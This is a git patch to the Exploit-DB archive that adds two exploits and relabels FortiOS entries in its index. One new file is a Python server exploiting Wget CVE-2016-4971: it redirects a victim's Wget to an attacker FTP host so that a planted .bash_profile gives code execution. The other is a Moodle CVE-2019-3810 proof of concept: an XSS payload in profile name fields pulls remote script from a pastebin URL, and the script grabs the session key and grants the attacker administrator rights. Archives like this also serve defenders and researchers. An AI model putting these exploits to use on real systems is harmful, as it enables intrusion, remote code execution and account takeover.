From 23c2c2fa040a77fe14a1c53aff75feb7ce0c0ac9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 1 May 2021 05:01:55 +0000 Subject: [PATCH] DB: 2021-05-01 4 changes to exploits/shellcodes GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) FortiOS < 5.6.0 - Cross-Site Scripting Fortinet FortiOS < 5.6.0 - Cross-Site Scripting FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit) FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit) Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) --- exploits/hardware/webapps/47287.rb | 2 +- exploits/hardware/webapps/47288.py | 2 +- exploits/linux/remote/49815.py | 54 ++++++++++++++++++++ exploits/php/webapps/49814.txt | 81 ++++++++++++++++++++++++++++++ files_exploits.csv | 10 ++-- 5 files changed, 143 insertions(+), 6 deletions(-) create mode 100755 exploits/linux/remote/49815.py create mode 100644 exploits/php/webapps/49814.txt diff --git a/exploits/hardware/webapps/47287.rb b/exploits/hardware/webapps/47287.rb index 48eca7846..a1c4a2e0a 100755 --- a/exploits/hardware/webapps/47287.rb +++ b/exploits/hardware/webapps/47287.rb @@ -1,4 +1,4 @@ -# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text. # Google Dork: intext:"Please Login" inurl:"/remote/login" # Date: 17/08/2019 # Exploit Author: Carlos E. Vieira diff --git a/exploits/hardware/webapps/47288.py b/exploits/hardware/webapps/47288.py index 8e0cde795..3b7cf322d 100755 --- a/exploits/hardware/webapps/47288.py +++ b/exploits/hardware/webapps/47288.py @@ -1,4 +1,4 @@ -# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. +# Exploit Title: Fortinet FortiOS Leak file - Reading login/passwords in clear text. # Google Dork: intext:"Please Login" inurl:"/remote/login" # Date: 17/08/2019 # Exploit Author: Carlos E. Vieira diff --git a/exploits/linux/remote/49815.py b/exploits/linux/remote/49815.py new file mode 100755 index 000000000..2526442ce --- /dev/null +++ b/exploits/linux/remote/49815.py @@ -0,0 +1,54 @@ +# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) +# Original Exploit Author: Dawid Golunski +# Exploit Author: liewehacksie +# Version: GNU Wget < 1.18 +# CVE: CVE-2016-4971 + +import http.server +import socketserver +import socket +import sys + +class wgetExploit(http.server.SimpleHTTPRequestHandler): + + def do_GET(self): + # This takes care of sending .wgetrc/.bash_profile/$file + + print("We have a volunteer requesting " + self.path + " by GET :)\n") + if "Wget" not in self.headers.get('User-Agent'): + print("But it's not a Wget :( \n") + self.send_response(200) + self.end_headers() + self.wfile.write("Nothing to see here...") + return + + self.send_response(301) + print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n") + new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE) + + print("Sending redirect to %s \n"%(new_path)) + self.send_header('Location', new_path) + self.end_headers() + + +HTTP_LISTEN_IP = '192.168.72.2' +HTTP_LISTEN_PORT = 80 +FTP_HOST = '192.168.72.4' +FTP_PORT = 2121 +FILE = '.bash_profile' + +handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit) + +print("Ready? Is your FTP server running?") + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +result = sock.connect_ex((FTP_HOST, FTP_PORT)) +if result == 0: + print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)) +else: + print("FTP is down :( Exiting.") + exit(1) + +print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT) + +handler.serve_forever() \ No newline at end of file diff --git a/exploits/php/webapps/49814.txt b/exploits/php/webapps/49814.txt new file mode 100644 index 000000000..7d0e5d370 --- /dev/null +++ b/exploits/php/webapps/49814.txt @@ -0,0 +1,81 @@ +# Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) +# Date: 04/2021 +# Exploit Author: farisv +# Vendor Homepage: https://moodle.org/ +# Software Link: https://download.moodle.org https://github.com/moodle/moodle/archive/refs/tags/v3.6.1.zip +# Version: Moodle < 3.6.2, < 3.5.4, < 3.4.7, < 3.1.16 +# CVE: CVE-2019-3810 + +Moodle is a learning platform designed to provide educators, administrators, +and learners with a single robust, secure and integrated system to create +personalised learning environments. + +The following is PoC to use the XSS bug on /userpix/ (CVE-2019-3810) for +privilege escalation from student to administrator. + +1. Upload the XSS payload [1] to pastebin or other similar service. + Change the value of userid to your own id. + Let's say the URL is https://pastebin.com/raw/xxxxxxxx. +2. Login to your student account. +3. Set first name with: + " style="position:fixed;height:100%;width:100%;top:0;left:0" onmouseover="x=document.createElement +4. Set surname with: + ('script');x.src='https://pastebin.com/raw/xxxxxxxx';document.body.appendChild(x); alert('XSS') +5. Ask the administrator to open /userpix/ page or put the link to that page + on your post and wait. + +If successful, your account will be added as administrator. + +See the demonstration video on https://github.com/farisv/Moodle-CVE-2019-3810 + +[1] XSS Payload for privilege escalation on Moodle. Change the value of userid to your id. + +var webroot = '/'; +var userid = '3'; +var sesskey = ''; + +function get(path, success) { + var xhr = new XMLHttpRequest(); + xhr.open('GET', webroot + path); + xhr.onreadystatechange = function() { + if (xhr.readyState > 3 && xhr.status == 200) { + success(xhr.responseText); + } + }; + xhr.send(); + return xhr; +} + +function post(path, data, success) { + var xhr = new XMLHttpRequest(); + xhr.open('POST', webroot + path); + xhr.onreadystatechange = function() { + if (xhr.readyState > 3 && xhr.status == 200) { + success(xhr.responseText); + } + }; + xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); + xhr.send(encodeURI(data)); + return xhr; +} + +function setAdmin() { + // Assign administrator access to userid + bpath = 'admin/roles/admins.php'; + data = "confirmadd=" + userid + "&sesskey=" + sesskey; + post(bpath, data, function(data){}); +} + +function getSesskey(data) { + var sesskey_find = data.indexOf('"sesskey":"'); + sesskey = data.substr(sesskey_find + 11, 10); + setAdmin(); +} + +function payload() { + // We can find Sesskey inside JS script in main page + get('', getSesskey); +} + +// Start +payload(); \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e9e885dba..1baf008cc 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18445,6 +18445,7 @@ id,file,description,date,author,type,platform,port 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",2021-04-08,"Google Security Research",remote,linux, 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",2021-04-12,HerculesRD,remote,unix, 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",2021-04-21,BenChaliah,remote,hardware, +49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)",2021-04-30,liewehacksie,remote,linux, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40613,7 +40614,7 @@ id,file,description,date,author,type,platform,port 42381,exploits/php/webapps/42381.txt,"Friends in War Make or Break 1.7 - SQL Injection",2017-07-26,"Ihsan Sencan",webapps,php, 42543,exploits/java/webapps/42543.txt,"Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write",2017-08-22,LiquidWorm,webapps,java, 42387,exploits/php/webapps/42387.txt,"Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection",2017-07-27,"Shahab Shamsi",webapps,php, -42388,exploits/hardware/webapps/42388.txt,"FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware, +42388,exploits/hardware/webapps/42388.txt,"Fortinet FortiOS < 5.6.0 - Cross-Site Scripting",2017-07-28,patryk_bogdan,webapps,hardware, 42401,exploits/jsp/webapps/42401.rb,"Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)",2017-08-01,"James Fitts",webapps,jsp, 42402,exploits/jsp/webapps/42402.rb,"Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload",2017-08-01,"James Fitts",webapps,jsp, 42403,exploits/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",webapps,php, @@ -42222,7 +42223,7 @@ id,file,description,date,author,type,platform,port 46163,exploits/windows/webapps/46163.txt,"Portier Vision 4.4.4.2 / 4.4.4.6 - SQL Injection",2019-01-14,"SySS GmbH",webapps,windows, 46164,exploits/cgi/webapps/46164.txt,"AudioCode 400HD - Command Injection",2019-01-14,Sysdream,webapps,cgi, 46168,exploits/php/webapps/46168.txt,"ownDMS 4.7 - SQL Injection",2019-01-15,"Ihsan Sencan",webapps,php,80 -46171,exploits/hardware/webapps/46171.py,"FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443 +46171,exploits/hardware/webapps/46171.py,"Fortinet FortiGate FortiOS < 6.0.3 - LDAP Credential Disclosure",2019-01-16,"Julio Ureña",webapps,hardware,443 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80 46173,exploits/php/webapps/46173.txt,"doorGets CMS 7.0 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80 46174,exploits/php/webapps/46174.txt,"ShoreTel / Mitel Connect ONSITE 19.49.5200.0 - Remote Code Execution",2019-01-16,twosevenzero,webapps,php,80 @@ -42668,8 +42669,8 @@ id,file,description,date,author,type,platform,port 47283,exploits/php/webapps/47283.txt,"Integria IMS 5.0.86 - Arbitrary File Upload",2019-08-16,Greg.Priest,webapps,php, 47284,exploits/asp/webapps/47284.txt,"Web Wiz Forums 12.01 - 'PF' SQL Injection",2019-08-16,n1x_,webapps,asp, 47286,exploits/php/webapps/47286.txt,"Kimai 2 - Persistent Cross-Site Scripting",2019-08-19,osamaalaa,webapps,php,80 -47287,exploits/hardware/webapps/47287.rb,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware, -47288,exploits/hardware/webapps/47288.py,"FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware, +47287,exploits/hardware/webapps/47287.rb,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure (Metasploit)",2019-08-19,"Carlos E. Vieira",webapps,hardware, +47288,exploits/hardware/webapps/47288.py,"Fortinet FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure",2019-08-19,"Carlos E. Vieira",webapps,hardware, 47289,exploits/php/webapps/47289.txt,"Neo Billing 3.5 - Persistent Cross-Site Scripting",2019-08-19,n1x_,webapps,php,80 47293,exploits/linux/webapps/47293.sh,"Webmin 1.920 - Remote Code Execution",2019-08-19,"Fernando A. Lagos B",webapps,linux, 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80 @@ -43983,3 +43984,4 @@ id,file,description,date,author,type,platform,port 49810,exploits/php/webapps/49810.py,"Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution",2021-04-29,"Leonardo Paiva",webapps,php, 49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php, 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple, +49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,